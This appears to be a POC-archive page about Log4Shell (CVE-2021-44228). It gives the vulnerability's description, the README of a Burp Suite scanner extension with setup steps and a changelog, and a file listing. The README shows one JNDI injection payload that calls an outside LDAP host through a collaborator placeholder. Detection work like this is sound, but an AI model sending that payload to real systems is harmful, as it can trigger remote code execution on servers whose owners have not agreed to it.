Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.
Readme
<h1 align="center">
<a href="https://github.com/0xDexter0us/Log4J-Scanner"><img src="https://raw.githubusercontent.com/0xDexter0us/Log4J-Scanner/main/images/log4j-scanner.png" alt="log4j" width="450" align="middle" style="vertical-align:top"></a>
</h1>
<h4 align="center">Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability with custom payloads.</h4>
---
<p align="center">
<a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
<img src="https://img.shields.io/github/release/0xDexter0us/Log4J-Scanner.svg">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
<img src="https://img.shields.io/github/downloads/0xDexter0us/Log4J-Scanner/total?label=downloads&logo=github&color=inactive">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/">
<img src="https://img.shields.io/github/stars/0xDexter0us/Log4J-Scanner.svg?style=social&label=Stars">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/">
<img src="https://img.shields.io/github/followers/0xDexter0us.svg?style=social&label=Follow">
</a>
<a href="https://twitter.com/intent/follow?screen_name=0xDexter0us">
<img src="https://img.shields.io/twitter/follow/0xDexter0us.svg?style=social&label=Follow">
</a>
<a href="https://discord.gg/bugbounty">
<img src="https://img.shields.io/badge/chat-on%20discord-7289da.svg">
</a>
</p>
---
## Disclaimer
> I am not responsible for your actions, burp-suite freezing, target getting hacked, thermonuclear war, or the current economic crisis caused by you following these directions. YOU are choosing to use this tool, and if you point your finger at me for messing anything up, I will LMAO at you.
---
## Instructions:
- Install the extension either from pre-compiled releases or build from source.
- Disable/Uncheck all other active scanning extensions like active scan++, burp bounty pro, param-miner etc.
- From Top-Menu open settings of Log4J Scanner.
- Add your custom payload and save settings.
- Select your target > right-click > Scan.
- Select `Scan Configuration` > `Select from library`
- Only select `Audit checks - extensions only` and hit OK button.
Special thanks to [Silent Signal](https://github.com/silentsignal), instructions and scan configurations are inspired from his extension.
### Important instructions to remember:
- In your custom payload DO __NOT__ add your collaborator url, just add `[collaborator-server]` as a placeholder,
- `[collaborator-server` will be replaced by your collaborator server url itself.
- Example payload: `"${jndi:ldap://[collaborator-server]/a}`
## Download releases
`https://github.com/0xDexter0us/Log4J-Scanner/releases/`
## Build from source
* `./gradlew build fatJar`
* Grab the jar file `build/libs/Log4J-Scanner-x.x.x.jar`
## Installation
1. Download the latest jar from releases or build from source.
2. Add the jar to Burp Suite.
#### If you like the project, please give the repo a star! <3
## Resources
- For passive scanning: `https://github.com/f0ng/log4j2burpscanner`
- For active scanning: `https://github.com/albinowax/ActiveScanPlusPlus` & `https://github.com/silentsignal/burp-log4shell`
## Changelog
**25 December 2021 - v0.2.0**
- Added Burp Collaborator api.
- Removed custom scanner.
- Added Burp scanner api.
**13 December 2021 - v0.1.0**
- First public release
## Thanks To
* CoreyD97 - https://github.com/CoreyD97
* Silent Signal - https://github.com/silentsignal
### This was coded be me within a day and is an initial release, bug might occur, bug reports, suggestions and pull requests all are welcome :)
-----
[](http://discord.gg/bugbounty)
[](https://ko-fi.com/Q5Q76ZT6K)
File Snapshot
[4.0K] /data/pocs/b901cecf89d42656f89e983a24ccc66aab2453c0
├── [ 650] build.gradle
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 58K] gradle-wrapper.jar
│ └── [ 200] gradle-wrapper.properties
├── [ 26] gradle.properties
├── [5.6K] gradlew
├── [2.7K] gradlew.bat
├── [4.0K] images
│ ├── [4.9K] log4j-scanner.png
│ └── [ 14M] useage.gif
├── [ 34K] LICENSE
├── [3.8K] README.md
├── [ 36] settings.gradle
└── [4.0K] src
└── [4.0K] main
├── [4.0K] kotlin
│ ├── [4.0K] burp
│ │ └── [ 117] BurpExtender.kt
│ └── [4.0K] com
│ └── [4.0K] dexter0us
│ └── [4.0K] log4jScanner
│ ├── [1.9K] Extension.kt
│ ├── [ 607] Globals.kt
│ ├── [2.5K] Log4JScanner.kt
│ └── [7.0K] Log4JUI.kt
└── [4.0K] resources
├── [547K] blog.png
├── [ 68K] github.png
├── [109K] htp.png
├── [ 50K] ko-fi.png
└── [135K] twitter.png
11 directories, 21 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →